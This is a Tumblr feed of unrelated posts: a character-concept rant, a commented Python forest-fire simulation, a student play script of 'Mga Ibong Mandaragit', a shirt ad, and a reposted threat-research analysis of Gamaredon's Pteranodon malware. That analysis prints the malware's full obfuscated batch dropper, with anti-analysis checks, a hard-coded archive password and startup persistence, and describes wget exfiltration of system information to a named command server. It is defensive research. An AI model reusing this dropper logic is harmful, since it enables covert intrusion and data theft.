#im 2nd from the right in the img :] | Explore Tumblr Posts and Blogs

puppet2611 · 1 year

Text

//from 4.24.23

daniel said to write more in here and im in a5 brainrot hell so

THIS PART OF A5 WAS ACTUALLY TAKEN FROM AN EARILER CONCEPT OF LF...

ok so its nothing too specific or special - just that the characters zodiacs have a special part in their stories ig 💥💥

well it only rlly applies to micheal and adam ngl

micheals a goat and adams a monkey 💥💥 (im talking abt chinese/birth year zodiacs)

this doesnt go into anything too deep, goat just means sacrifice and monkey is just a reference to a monkeys paw

micheal is really the only thing the family ever had to sacrifice and it fits in with him being catholic soo why not!! adams just a horrible bad luck attractor btw. ollies luck is sm better when hes not around

oh yeah abt oliver i decided hes gonna either b transfem or bigender 👍👍 he/she prns r fine & he goes by oliver, ollie or oliver :]

might as well continue and finish it idk

olivers also bi-romantic & asexual :3

adam and micheal r both cissies/lhj... adams deadass just gay and micheal is panromantic asexual ^_^ only reason adams not ace is for my sillu dilly rps with mfs on chai/hj

I WISH I HAD SONGS TO ASSIGN THEM BUT I RLLY DINT HAVE ANYTHING RN... i guess olivias sweet tooth by cavetown but thats like it lmfao

THIS IS SO WRONG NOW... NEW MICHEAL CONCEPT (replying to micheals old concept design)

2nd img is after death/ in the afterlife !! dont mind the text

SHITPOST ART OF HIM FROM A MAGMA WITH BUGZ BTW 😭😭 its too goofy not to show

stupid gay/j

OH YEAH I HAVE TO ADD CONTEXT TO THIS BUT UHMM I WAS RPING AS ADAM WITH A RANDOM CHARACTER FROM A FANDOM IM IN AND THEY GOT TOO FRUITY. THIS POPPED IN MY MIND WHILE I WAS OUT SHOPPING W/ MY DAD 😦 the canon charaer on first img. im cringe and a oc x canon shipper

this was set after micheals death kind of in a au where adam doesnt get depression and fixates on him for years on end 💀 but anyways itd kinda be funny if it wasnt // if they had an open relationship but when micheal finds out hes just like. "you fucked the mf bishop of the basilica?? how am i gonna show up to church each week w/o him staring at me funny now." 😭😭

anyways that eas just a random thought

i was thinking that red would be yhe overall main color for the story :3c adam already wears red usually, red is practically going to be micheals main color in art concepts i have and oliver just looks good in it lol

oh i forgot to mention earlier

i havent done the math for what year oliver wouldve been born in but im thinking his zodiac would be a dog.. theres nothing big behind it either, its just that hes kinda lost w/o adam or micheal and would probably run back to them no matter what - slight reference to the song like a dog ^^ - but its also kinda based on the fact habit said he gave off doberman vibes lol

unless yall rlly wanna judge them based off their birth month zodiacs i dont think ill give them actual birthdays 💀 but micheals birthday is april 5, just because its kind of a main part to yhe story.. (ihy server stfu abt zodiacs for one second challenge fr. i got called slurs bcz im a leo)

mentioning this again!!

i have basic ideas on how to draw scenes attached to the lyrics now :)

"see how his feet miss the ground" - plain red background against two feet just kinda dangling from the top. the lyrics are right below the shadow

"and he falls inside a hole he dug for me" - i really didnt know what to for this even after hours of thinking since micheal never planned to kill adam or anything alike so i just opted to have adam standing there in shock again, against a plain red background. theres might be a little of that on his hands too :]

"the kind of irony youd read in bible stories" - shillouette of micheal sitting up jn his grave. the backgrounds still red. hes holding a white book with yellow text on it ^_^ you might be able to infer what the book is from the lyrics imo (replying to another msg. too long to include )

i might make a bunch more oc x canon (8:11) interactions soon too :33 or crossover stuff

like ryker meeting both emilio and oliver (mc meeting lol) or emilio meeting micheal since micheal wanted to be a priest but last minute settled for being a jeweler 😞

i deadass kinda want micheal to meet my friends oc felix but i have not the slightest idea how that would work

ooo micheal and aster meeting would be cool too ( old jewelery making mfs/silly )

Anyways that's all I've got for now!! i might come back jn a bit or some other time ^^

#rant archive

0 notes

your-article-is-too-long · 4 years

Text

How Does Fire Spread?

This is supplementary material for my Triplebyte blog post, “How Does Fire Spread?”

The following code creates a cellular automaton forest fire model in Python. I added so many comments to this code that the blog post became MASSIVE and the code block looked ridiculous, so I had to trim it down.

… but what if someone NEEDS it?

# The NumPy library is used to generate random numbers in the model. import numpy as np # The Matplotlib library is used to visualize the forest fire animation. import matplotlib.pyplot as plt from matplotlib import animation from matplotlib import colors # A given cell has 8 neighbors: 1 above, 1 below, 1 to the left, 1 to the right, # and 4 diagonally. The 8 sets of parentheses correspond to the locations of the 8 # neighboring cells. neighborhood = ((-1,-1), (-1,0), (-1,1), (0,-1), (0, 1), (1,-1), (1,0), (1,1)) # Assigns value 0 to EMPTY, 1 to TREE, and 2 to FIRE. Each cell in the grid is # assigned one of these values. EMPTY, TREE, FIRE = 0, 1, 2 # colors_list contains colors used in the visualization: brown for EMPTY, # dark green for TREE, and orange for FIRE. Note that the list must be 1 larger # than the number of different values in the array. Also note that the 4th entry # (‘orange’) dictates the color of the fire. colors_list = [(0.2,0,0), (0,0.5,0), (1,0,0), 'orange'] cmap = colors.ListedColormap(colors_list) # The bounds list must also be one larger than the number of different values in # the grid array. bounds = [0,1,2,3] # Maps the colors in colors_list to bins defined by bounds; data within a bin # is mapped to the color with the same index. norm = colors.BoundaryNorm(bounds, cmap.N) # The function firerules iterates the forest fire model according to the 4 model # rules outlined in the text. def firerules(X): # X1 is the future state of the forest; ny and nx (defined as 100 later in the # code) represeent the number of cells in the x and y directions, so X1 is an # array of 0s with 100 rows and 100 columns). # RULE 1 OF THE MODEL is handled by setting X1 to 0 initially and having no # rules that update FIRE cells. X1 = np.zeros((ny, nx)) # For all indices on the grid excluding the border region (which is always empty). # Note that Python is 0-indexed. for ix in range(1,nx-1): for iy in range(1,ny-1): # THIS CORRESPONDS TO RULE 4 OF THE MODEL. If the current value at # the index is 0 (EMPTY), roll the dice (np.random.random()); if the # output float value <= p (the probability of a tree being growing), # the future value at the index becomes 1 (i.e., the cell transitions # from EMPTY to TREE). if X[iy,ix] == EMPTY and np.random.random() <= p: X1[iy,ix] = TREE # THIS CORRESPONDS TO RULE 2 OF THE MODEL. # If any of the 8 neighbors of a cell are burning (FIRE), the cell # (currently TREE) becomes FIRE. if X[iy,ix] == TREE: X1[iy,ix] = TREE # To examine neighbors for fire, assign dx and dy to the # indices that make up the coordinates in neighborhood. E.g., for # the 2nd coordinate in neighborhood (-1, 0), dx is -1 and dy is 0. for dx,dy in neighborhood: if X[iy+dy,ix+dx] == FIRE: X1[iy,ix] = FIRE break # THIS CORRESPONDS TO RULE 3 OF THE MODEL. # If no neighbors are burning, roll the dice (np.random.random()); # if the output float is <= f (the probability of a lightning # strike), the cell becomes FIRE. else: if np.random.random() <= f: X1[iy,ix] = FIRE return X1 # The initial fraction of the forest occupied by trees. forest_fraction = 0.2 # p is the probability of a tree growing in an empty cell; f is the probability of # a lightning strike. p, f = 0.05, 0.001 # Forest size (number of cells in x and y directions). nx, ny = 100, 100 # Initialize the forest grid. X can be thought of as the current state. Make X an # array of 0s. X = np.zeros((ny, nx)) # X[1:ny-1, 1:nx-1] grabs the subset of X from indices 1-99 EXCLUDING 99. Since 0 is # the index, this excludes 2 rows and 2 columns (the border). # np.random.randint(0, 2, size=(ny-2, nx-2)) randomly assigns all non-border cells # 0 or 1 (2, the upper limit, is excluded). Since the border (2 rows and 2 columns) # is excluded, size=(ny-2, nx-2). X[1:ny-1, 1:nx-1] = np.random.randint(0, 2, size=(ny-2, nx-2)) # This ensures that the number of 1s in the array is below the threshold established # by forest_fraction. Note that random.random normally returns floats between # 0 and 1, but this was initialized with integers in the previous line of code. X[1:ny-1, 1:nx-1] = np.random.random(size=(ny-2, nx-2)) < forest_fraction # Adjusts the size of the figure. fig = plt.figure(figsize=(25/3, 6.25)) # Creates 1x1 grid subplot. ax = fig.add_subplot(111) # Turns off the x and y axis. ax.set_axis_off() # The matplotlib function imshow() creates an image from a 2D numpy array with 1 # square for each array element. X is the data of the image; cmap is a colormap; # norm maps the data to colormap colors. im = ax.imshow(X, cmap=cmap, norm=norm) #, interpolation='nearest') # The animate function is called to produce a frame for each generation. def animate(i): im.set_data(animate.X) animate.X = firerules(animate.X) # Binds the grid to the identifier X in the animate function's namespace. animate.X = X # Interval between frames (ms). interval = 100 # animation.FuncAnimation makes an animation by repeatedly calling a function func; # fig is the figure object used to resize, etc.; animate is the callable function # called at each frame; interval is the delay between frames (in ms). anim = animation.FuncAnimation(fig, animate, interval=interval) # Display the animated figure plt.show()

#fire #python #cellular automata #wavepropagation #forestfires #mathmodel #triplebyte

0 notes

arviecanada-blog · 5 years

Text

Script of Mga Ibong Mandaragit by Amado Hernandes (english version)

scene 1; narrator: Andoy is a slave of don Segundo monteros' house. Don Segundo told the Japanese soldiers to arrest andoy because don Segundo finds out that he is a guerilla( a type of irregular warfare: that is, it aims not simply to defeat an enemy, but to win popular support and political influence, to the enemy's cost). Andoy and his two friends that are also a guerrilla escaped from the house of Don Segundo. They decided to go to the house of Tata Matyas. Andoy: It looks like we're all tired, we need to rest and let the day pass until morning. Karyo: That's a good idea, Andoy Martin: Wait, I think that's the house of Tata Matyas Andoy: that's right, come on, faster| narrator: And the three guerrillas' reached the house of tata Matyas Tata Matyas: Oh, what are you doing here? and who are they? Andoy: we're here because we're being hunted by the Japanese soldiers' scene 2: narrator: tata Matyas welcomes them to his house. tata matyas gives them all the food that tata Matyas has. after they ate the food, karyo, and martin takes a rest and went to sleep. while tata Matyas and andoy are busy telling a story about the time when Dr. Jose Rizal created its own works which are " Noli Me Tangere" and " El Filibusterismo." Tata Matyas believes that the treasure of Simon Ibarra (which is the antagonist of the story) is true and he told Andoy that he knows the exact location of the treasure. Tata Matyas: it can be found on the sea of atimonan Andoy: oh, really? if that's true, tomorrow after the sunrise, we will try to find the treasure and I'll promise that if we found it I'll give you money because of welcoming us to your house and for telling me about the treasure. SCENE 3: narrator: the three guerrillas went to the sea of atimonan to find the treasure that tata Matyas said. They are all excited to find the treasure because it can help them to become rich and wealthy men. Andoy: I think we're really close to the location of the chest karyo: come on, we need to find it as faster as we can because there are lots of shark on this sea. Martin: What are you waiting for? let's dive in and find the chest narrator: They continue to dive into the deeper part of the sea, and when they reached the deeper part, andoy saw the chest and they helped each other to lift up the chest to the boat. Unfortunately, when they're near in the boat Karyo he sacrificed his life for his two friends from the shark attack. Andoy: karyo! Martin:karyo! Andoy: wait for me, I’ll save you from that stupid shark Martin: Never mind him, we don’t need him, we need the chest so let the shark take care of him Andoy: don’t be stupid martin, he is our friend and I don’t want to lose him Martin: but you cant save him anymore, he is gone (Martin sails the boat) Scene 4: Narrator: Martin and andoy finally reached the seashore but martin has an intention to kill andoy because he wants to get the chest by his self and be a wealthy man. Andoy: Come on martin, we need to go to tata Matyas, because I promised him to give a share Martin : okay (evil laugh) ( andoy turns back) Fight scene until karyo died Andoy: im sorry my friend but it’s your fault Narrator: that scar on his right cheeks result to disguise as mando plaridel to have a revenge to don segundo montero Mando (andoy) created a newspaper, the “kampilan” that has content about corrupt politicians. Mando requested his friend Magat to keep his newspaper and to take charge on his newspaper. mando bought a new house in manila to tata matyas live there. Mando wants to tour the world to gain more learnings. Before he go mando meets his uncle and his cousin to say goodbye. Mando: tata pastor im here to say goodbye because I'm going to states to have fun and learn new things but ill promise that ill always send a letter for the both of you. Narrator: tata pastor and puri didn’t know that mando is andoy. Scene 5: paris Narrator: mando is in the paris and he saw a boy harassing a girl. Mando saved the girl and mando Rapist: (Looking at dolly) starts to do his bad plan Dolly : Help !( crying and shouting) Help! Someone please help me! Rapist: your very beautiful ( evil laugh) ( andoy is sitting on a chair and suddenly he saw this girl who is asking for help|)8 Andoy: ohhh wait, she looks familiar to me (going to the rapist ) (starts to fight with the rapist) Andoy: go away stupid! ( rapist starts to escape) Andoy: are you okay miss? Dolly: I’d been hurt by that person Andoy: Really? That kind of person don’t have a right to live in this world Dolly: Yes, he didn’t have good manner. By the way, thank you for helping me, whats your name? Andoy:oh it’s my pleasure to help you, I’m Mando Plaridel from Philippines

Narrator : Dolly didn’t know that mando is andoy their ex slave. Dolly had a feeeling for mando and mando too. Mando turn back in manila,Philippines and dolly is also in the manila.

Narrator : Dolly didn’t know that mando is andoy their ex slave. Dolly had a feeeling for mando and mando too. Mando turn back in manila,Philippines and dolly is also in the manila.Dolly invited mando to come in their house with celebration and to introduce mando in her family.

Scene 6: Philippines ( on the meeting with the president and other officials)

Dolly: (Holding hands with mando) (Introduces mando to all) Excuse us Girl: who is that person?

Don Segundo: who’s that guy, dolly?

Dolly: he’s Mando Plaridel my dearest boyfriend

Mando: Good morning everyone

President: (stand and look at mando with an angry face) oh if im not mistaken, you’re the author of kampilan

Don segundo: yes he is.

Mando: Yes! And I think your one of the politician that are affected by the content.

Scene 7: Narrator: Don Segundo pleaded to Dolly to personally contact mando with the aim of utilizing the people's solid trust in Kampilan to improve their reputation and business but Mando did not agree. this time he has revealed the real Mando, who is nothing but Andoy, who has been a maid and a torment then and now a wealthy man who drove Dolly's heart and advocating his father. A few days later, they tried to kill mando but they failed to kill him. Two of the three suspects lived and they asked the two if who is the mastermind of this plan while mando is suffering from the gun shots on his arm.

ANDOY: Now tell us who is the mastermind of this plan?

Two suspect: No, im the mastermind

Andoy: don’t lie I know there’s someone behind this (punched the two suspect) Two suspect: Okay stop stop, heneral bayoneta, senator botin and the other officials

Narrator: all the officials that are involved in the plan escaped and are waiting for the tension to be calm.

Scene 8:

Narrator: There was a fire in Hacienda Montero and the guilty defendants were farmers and civilian guards put guns and other documents in the houses to show that the farmers were the suspects and the guards arrest the farmers. After tata Pastor was beaten in jail when he did not want real possessions of weapons in their home, mang tumas and one farmer followed their death and this results to the farmers to have a revenge and said that the hacienda belongs tot them.

1st farmer: we need to move, all of them needs to go to jail

2nd farmer: yeahhh! We need to fight for freedom and for the other farmers Narrator: Due to circumstances of conflict, the army provided a report on what could have happened when the peasants' uprisings and violent activities were over, so the President called on Mando, Senator Bright and Dr. Sabio to find an opinion but ultimately decided on his own mind because at the time they talked, two truckers of a civilian guard in Hacienda ran and fired the peasants who were killed by Pastor. Here they saw Mando, Danoy and other survivors who had to start the change, co-opting the crooked principles that were lively to the bigger predators that absorbed the blood of the dying Filipinos in their desire proper and equal treatment of a person, whether a millionaire or one employee.

Hope you will like it!

<a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text" property="dct:title" rel="dct:type">Script of Mga Ibong Mandaragit(english )</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="https://arviecanada.tumblr.com/post/186861016825/enjoy-your-youth-life-but-make-sure-you-dont" property="cc:attributionName" rel="cc:attributionURL">Arvie B. Cañada</a> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.<br />Based on a work at <a xmlns:dct="http://purl.org/dc/terms/" href="www.tumblr.com" rel="dct:source">www.tumblr.com</a>.

0 notes

teespix · 5 years

Text

I'm A Simple Woman I Love Game Of Throne, Avenger And Sons Of Anarchy Shirt

I’m A Simple Woman I Love Game Of Throne, Avenger And Sons Of Anarchy Shirt

I suggest UK high cadre should visit Iran with an open heart. And sit there with an open heart to get a settlement for peace and friendship. It is the I’m A Simple Woman I Love Game Of Throne, Avenger And Sons Of Anarchy Shirt UK should come. forward and prove the UK is not as it was in 1st & 2nd world war. This is a total mess Trump started for no reason, by withdrawing from a nuclear agreement,…

View On WordPress

0 notes

terabitweb · 5 years

Text

Original Post from Security Affairs Author: Pierluigi Paganini

Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state-actor dubbed Gamaredon.

Introduction

Few days after the publication of our technical article related to the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier on-going operation.

This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon. The Gamaredon APT was first spotted in 2013 and in 2015, when researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon, targeting other Ukrainian entities. Their “special attention” on Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.

The discovered attack appears to be designed to lure military personnel: it leverage a legit document of the “State of the Armed Forces of Ukraine” dated back in the 2nd April 2019.

Figure 1: Fake document shown after infection

For this reason, Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.

Sha256 41a6e54e7ac2d488151d2b40055f3d7cacce7fb53e9d33c1e3effd4fce801410 Threat Gamaredon Pteranodon stager (SFX file) Ssdeep 12288:VpRN/nV+Nn3I4Wyawz2O7TE+sNEAMqdJnGB6q5c7pQbaOwWsAsK0iR7bkfeanZ8O:VpT/nV+N3I

Table 1: Information about analyzed sample

Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle software with an invalid signature. Its expiration date has been set up the 16th of March 2019.

Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the SFX archive reveals four different files. One of them is batch file containing the actual infection routine.

Figure 3: Files contained in SFX archive

@echo offset xNBsBXS=%random%*JjuCBOSFor %%q In (wireshark procexp) do (TaskList /FI “ImageName EQ %%q.exe” | Find /I “%%q.exe”)If %ErrorLevel% NEQ 1 goto exitIf SddlzCf==x86 Set WqeZfrx=x64if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset “ldoGIUv=%APPDATA%MicrosoftWindowsStart MenuProgramsStartup”CEFNPKLIf SddlzCf==x86 Set WqeZfrx=x64set “UlHjSKD=%USERPROFILE%”set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset fnQWAZC=winsetupset xNBsBXS=%random%*JjuCBOSset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset “paJvVjr=Document”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset eBqwVLK=%fnQWAZC%.lnkCEFNPKLif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset YFCaOEf=28262set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset vvozoFB=11326set lDwWuLo=26710If SddlzCf==x86 Set WqeZfrx=x64set prJqIBB=dcthfdyjdfcdst,tvset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOStaskkill /f /im %fnQWAZC%.exeCEFNPKLRENAME “%lDwWuLo%” %lDwWuLo%.exeset xNBsBXS=%random%*JjuCBOS%lDwWuLo%.exe “-p%prJqIBB%set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXScopy /y “%fnQWAZC%” “%UlHjSKD%%fnQWAZC%.exe”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSif exist “%UlHjSKD%%fnQWAZC%.exe” call :GhlJKaGIf SddlzCf==x86 Set WqeZfrx=x64if not exist “%UlHjSKD%%fnQWAZC%.exe” call :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%YFCaOEf%” %eBqwVLK%if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOScopy “%eBqwVLK%” “%ldoGIUv%” /yset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSRENAME “%vvozoFB%” “%paJvVjr%.docx”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS”%CD%%paJvVjr%.docx”set xNBsBXS=%random%*JjuCBOSexit /b :GhlJKaGif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSstart “” “%UlHjSKD%%fnQWAZC%.exe”CEFNPKLexit /b :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%fnQWAZC%” %fnQWAZC%.exe::6start “” “%fnQWAZC%.exe”If SddlzCf==x86 Set WqeZfrx=x64exit /b

Firstly, this batch script looks for the presence of running Wireshark and Process Explorer programs through the tasklist.exe utility. Then it renames the “11326” file in “Document.docx” and opens it. This is the decoy document seen in Figure 1.

The third step is to extract the contents of the password protected archive named “26710”. The scripts uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing them it on “%USERPROFILE%winsetup.exe” and creating a LNK symlink into the “%APPDATA%MicrosoftWindowsStart MenuProgramsStartup” directory to ensure its persistence.

Sha256 653a4205fa4bb7c58ef1513cac4172398fd5d65cab78bef7ced2d2e828a1e4b5 Threat Gamaredon Pteranodon stager (SFX) Ssdeep 12288:9pRN/nV+Nn4mNoks/EysKvqjigldJuFjBqg9DmTBs34I8:9pT/nV+N4QokKK7zg9qgQI8

Table 2: Information about SFX stager

This additional file is a SFX file containing another script and a PE32 binary.

Figure 4: Files contained in SFX archive

“MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Window, a free utility for non-interactive HTTP downloads and uploads, a flexible tool commonly used by sys-admins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the malware gather information about the compromised machine through the command “systeminfo.exe”. The results are stored into the file “fnQWAZC” and then sent to the command and control server “librework[.ddns[.net”, leveraging the wget utility previously found.

Figure 5: The C2 and obfuscations technique

MicrosoftCreate.exe –user-agent=”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0″ –post-data=”versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host: ADMIN-PC+###…….”

Figure 6: Information about victim machine sent to C2

The malware also schedules the execution of two other actions.

Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.ddns[.net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_cash.exe”, is stored into the “%APPDATA%RoamingMicrosoftIE” folder. Despite the different name, it actually is another copy of the wget tool.

Figure 8: Persistence through task schedule (II)

The second scheduled activity is planned every 32 minutes and it is designed to run the files downloaded by the previous task. A typical trick part of the Gamaredon arsenal from long time: in fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant edits with respect to previous variants.

In the end, investigating the “librework[.ddns[.net” domain we discovered several other samples connect to the same C2. All of them appeared in-the-wild during the first days of April, suggesting the command infrastructure might still be fully functional.

Figure 9: other samples linked to “librework[.ddns[.net” C2 (Source:VT)

Conclusion

The Pteranodon implant seems to be constantly maintained by the Gamaredon APT group since 2013, a tool the attackers found very effective since they are still using it after such a long time. Apart this technical consideration, is quite interesting to notice how strong seems to be the Russian interest towards the East-Europe, along with the other recent state-sponsored activities possibly aimed to interfere with the Ukrainian politics (See “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber-threat is operating in several fronts.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.

The Russian Shadow in Eastern Europe: Ukrainian MOD Campaign.

window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199";

try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – Ukraine, Gamaredon)

The post The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign appeared first on Security Affairs.

#gallery-0-6 { margin: auto; } #gallery-0-6 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-6 img { border: 2px solid #cfcfcf; } #gallery-0-6 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Pierluigi Paganini The Russian Shadow in Eastern Europe: Gamaredon ‘s Ukrainian MOD Campaign Original Post from Security Affairs Author: Pierluigi Paganini Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state-actor dubbed Gamaredon.

#Security Affairs blog

0 notes